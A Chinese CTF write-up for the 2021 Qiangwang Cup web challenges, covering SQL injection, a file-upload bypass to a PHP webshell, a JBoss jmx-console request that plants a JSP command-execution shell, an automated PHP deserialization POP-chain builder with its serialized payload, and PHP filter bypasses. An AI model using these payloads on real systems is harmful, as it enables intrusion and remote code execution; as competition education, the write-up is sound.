Toc
  1. EASYWEB
  2. pop_master
  3. [强网先锋]寻宝
    1. KEY1
    2. Key2
Toc
0 results found
白帽酱
第五届强网杯全国网络安全挑战赛WEB-部分writeup-强网杯2021
2021/06/14 CTF CTF WRITEUP 强网杯

EASYWEB

LZYFHP@LAC_IENMHL__OT8M.png
控制台查看网络请求发现flies

PM~Z_FZ__FU_B_V_FHG7_ZD.png
访问47.104.137.239/files/c09358adff2ebfff2ef9b4fbacc4ac0b 下载hint.txt 拿到提示

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

根据提示通过端口扫描发现36842端口开放
图片.png
图片.png
username存在sql注入

POST /account/login HTTP/1.1
Host: 47.104.137.239:36842
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
DNT: 1
Connection: close
Referer: http://121.42.242.238:36842/account/login
Cookie: ci_session=bo397pc9n0pd318uetdbl1r5rh33u3jb
Upgrade-Insecure-Requests: 1

username=admin*&password=admin

图片.png
拿到登陆账号密码
admin 99f609527226e076d668668582ac4420
登陆后台
后台没有可以利用的地方

继续扫描目录 发现文件上传路由
图片.png
构造文件名绕过限制上传php文件
图片.png
由于权限太低无法getflag (只有owner有权限 flag权限应该是0440) 需要root用户组
继续查看监听端口发现有其他服务
图片.png
通过上传的小马写入新的phpshell
通过shell搭建隧道 访问web服务

发现是一个存在jmx-console未授权访问的jboss

图片.png

/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell1&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25 if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%25>&argType=boolean&arg4=True

写入一句话shell
图片.png
成功getflag
图片.png

pop_master

图片.png
图片.png
该题需要构造反序列化利用链 最终实现RCE
由于该题目类数量巨大1W个 编写自动化脚本构造pop链

第一步将class.php.txt转化成AST(抽象语法树) 保存为json格式
<?php
ini_set(“memory_limit”,”-1”);
echo(json_encode(ast\parse_file(“class.php”, $version=70)));
构造比较简单A->B->C->…….->包含EVAL()的class function
图片.png
调用这里有几个坑 1.调用途中有参数污染(附加垃圾数据) 2.调用途中传参可能被清空 (传参被赋值未定义的变量)3.调用途中传参可能被修改 (直接赋值为垃圾数据)
所以并不是找到调用链就可以完成工作 而是需要找到可以利用的调用链

自动化代码:
PS:没有什么参考价值 只对该题可用 因为固定3种函数结构所以偷懒把参数写死了 初学py语言 第一次做AST树解析用这种笨方法)

## -*- coding: utf-8 -*-
import json
import random
import os
import string
with open("12.json") as f:
line=f.readline()
result=json.loads(line)
print(len(result['children']))
def asb(name,s,s1=''):
ee = 0
for a in result['children']:
for b in a['children']['stmts']['children']:
if 'name' in b['children'].keys():
if (b['children']['name'] == 'gG1T5D'):
ee = 0
#ee=1
if (b['children']['name'] == name):
test(a)
if(len(b['children']['stmts']['children'])==3):
q = b['children']['stmts']['children'][1]['children'][0]['children']['cond']['children']['args']['children'][1]
w = b['children']['stmts']['children'][random.randint(1,2)]['children'][0]['children']['cond']['children']['args']['children'][1]#随机分支 玄学构造
#print(s + q)
#print(s + w)
ran_str = ''.join(random.sample(string.ascii_letters, 8))
print('$'+ran_str+'=new '+a['children']['name']+'();')
s11='$' + ran_str + '->' + a['children']['stmts']['children'][0]['children']['props']['children'][0]['children']['name'] + '='
#if s1!='':

# asb(w, s +w+'-->')
# asb(q, s +q+'-->')
if ee!=1:
asb(w,s,s11)# 分支函数1
#asb(q, s, s11)# 分支函数2
if ran_str == '':
exit()
print(s1 + '$' + ran_str+';')


#asb(q, s +q+'-->')

else:
if 'method' in b['children']['stmts']['children'][1]['children'].keys():# 没有分支
q = b['children']['stmts']['children'][1]['children']['method']
ran_str = ''.join(random.sample(string.ascii_letters, 8))
print('$' + ran_str + '=new ' + a['children']['name'] + '();')
s11 = '$' + ran_str + '->' + a['children']['stmts']['children'][0]['children']['props']['children'][0]['children']['name'] + '='
#print(s + q)
if ee != 1:
asb(q, s, s11)
if ran_str == '':
exit()
print(s1 + '$' + ran_str + ';')


def test(d):
#if name in {'Name','COiLxB'}:
#print('nono')
#exit()
try:
a=d['children']['stmts']['children'][1]['children']['params']['children'][0]['children']['name']
b=d['children']['stmts']['children'][1]['children']['stmts']['children'][0]['children']['stmts']['children'][0]['children']['var']['children']['name']
c=d['children']['stmts']['children'][1]['children']['stmts']['children'][0]['children']['stmts']['children'][0]['children']['expr']['children']['name']
if(a==b and b!=c and a!='DgiNa'): #判断赋值是否是用不存在的变量覆盖传参

print(a,b,c)
print('no')
asb('YYdqkf', 'YYdqkf' + '-->')#重新搜索
os._exit(0)

except:
pass
asb('YYdqkf','YYdqkf'+'-->')

编写脚本处理AST
随机抽取一条构造链 检验是否正常执行(传参修改检测) 反复抽取得到可用的链
图片.png
ps:例图输出与下面代码无关 找不到成功的图了

<?php
此处省略3M大小的源class
$a=new WK4tcG();
$prXsQMfO=new WK4tcG();
$DLcTtAga=new xaeGnG();
$lcbgRpGI=new oAMzcx();
$IatldcbW=new p38LCI();
$nULgbaKw=new GbfW4c();
$ASyQaYMV=new m2s3zO();
$GMwztlCS=new PgSSqR();
$MegPsOnX=new RLuIRL();
$neJOwgfu=new WykBAC();
$PNHChDce=new g6hgDh();
$BzceWjKp=new HDaeRV();
$YThMXwcb=new bREm3w();
$xWVjhwmO=new D0aZh5();
$BIbCvgZD=new T9NX4U();
$prvhXPMW=new eWciOL();
$NVHbgdzD=new TqWDlm();
$mszgihWC=new XoFA87();
$vDBkPwqO=new MU1ai5();
$ZYHhsIid=new eHtdBF();
$ZYHhsIid->V7XKdgi=new DNUWgV();
$vDBkPwqO->zXEmp6T=$ZYHhsIid;
$mszgihWC->z35pfqP=$vDBkPwqO;
$NVHbgdzD->KGgGFnb=$mszgihWC;
$prvhXPMW->D6qeYVK=$NVHbgdzD;
$BIbCvgZD->UwQCEH2=$prvhXPMW;
$xWVjhwmO->ST8sCZq=$BIbCvgZD;
$YThMXwcb->pMgtiwK=$xWVjhwmO;
$BzceWjKp->OO72gIu=$YThMXwcb;
$PNHChDce->GYBlHLq=$BzceWjKp;
$neJOwgfu->yWYNYcP=$PNHChDce;
$MegPsOnX->dFy0Irz=$neJOwgfu;
$GMwztlCS->Cs99EPC=$MegPsOnX;
$ASyQaYMV->QidIkAq=$GMwztlCS;
$nULgbaKw->gE4DrP9=$ASyQaYMV;
$IatldcbW->OksedLV=$nULgbaKw;
$lcbgRpGI->SUxaKsh=$IatldcbW;
$DLcTtAga->u3832FP=$lcbgRpGI;
$a->fBuH5Og=$DLcTtAga;
//$a = $_GET['pop'];
$b = $_GET['argv'];
echo serialize($a);
//$a = unserialize($a);
//var_dump($a);
$a->YYdqkf($b);
?>

生成序列化文本
?pop=O:6:%22WK4tcG%22:1:{s:7:%22fBuH5Og%22;O:6:%22xaeGnG%22:1:{s:7:%22u3832FP%22;O:6:%22oAMzcx%22:1:{s:7:%22SUxaKsh%22;O:6:%22p38LCI%22:1:{s:7:%22OksedLV%22;O:6:%22GbfW4c%22:1:{s:7:%22gE4DrP9%22;O:6:%22m2s3zO%22:1:{s:7:%22QidIkAq%22;O:6:%22PgSSqR%22:1:{s:7:%22Cs99EPC%22;O:6:%22RLuIRL%22:1:{s:7:%22dFy0Irz%22;O:6:%22WykBAC%22:1:{s:7:%22yWYNYcP%22;O:6:%22g6hgDh%22:1:{s:7:%22GYBlHLq%22;O:6:%22HDaeRV%22:1:{s:7:%22OO72gIu%22;O:6:%22bREm3w%22:1:{s:7:%22pMgtiwK%22;O:6:%22D0aZh5%22:1:{s:7:%22ST8sCZq%22;O:6:%22T9NX4U%22:1:{s:7:%22UwQCEH2%22;O:6:%22eWciOL%22:1:{s:7:%22D6qeYVK%22;O:6:%22TqWDlm%22:1:{s:7:%22KGgGFnb%22;O:6:%22XoFA87%22:1:{s:7:%22z35pfqP%22;O:6:%22MU1ai5%22:1:{s:7:%22zXEmp6T%22;O:6:%22eHtdBF%22:1:{s:7:%22V7XKdgi%22;O:6:%22DNUWgV%22:1:{s:7:%22bieiHE3%22;N;}}}}}}}}}}}}}}}}}}}}&argv=system(%27cat%20/flag%27);//
访问即可getflag
图片.png

[强网先锋]寻宝

图片.png
需要两个KEY 来getflag

KEY1

 <?php
header('Content-type:text/html;charset=utf-8');
highlight_file(__file__);


function filter($string){
$filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
$filter_phrase= '/'.implode('|',$filter_word).'/';
return preg_replace($filter_phrase,'',$string);
}


if($ppp){
unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';

extract($_POST);

$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);


if(isset($num1) && is_numeric($num1)){
die("非数字");
}

else{

if($num1 > 1024){
echo "第一层";
if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
echo "第二层";
if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
echo "第三层";
if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
echo "第四层";
if(!isset($num5)||(strlen($num5)==0)) die("no");
$b=json_decode(@$num5);
if($y = $b === NULL){
if($y === true){
echo "第五层";
include 'KeY1lhv.php';
echo $KEY1;
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no111");
}
}

number1 number2使用科学计数法
number3 md5前缀碰撞
number4 带负号的0值绕过
number5 json {1}即为true
图片.png
成功拿到KEY1

Key2

图片.png
下载文件
图片.png
压缩包内有大量docx文件
编写脚本提取docx正文文本 寻找带有KEY的文本
图片.png
找到KEY2
KEY1 KEY2提交到网站 成功getflag

本文作者:白帽酱
版权声明:本文首发于白帽酱的博客,转载请注明出处!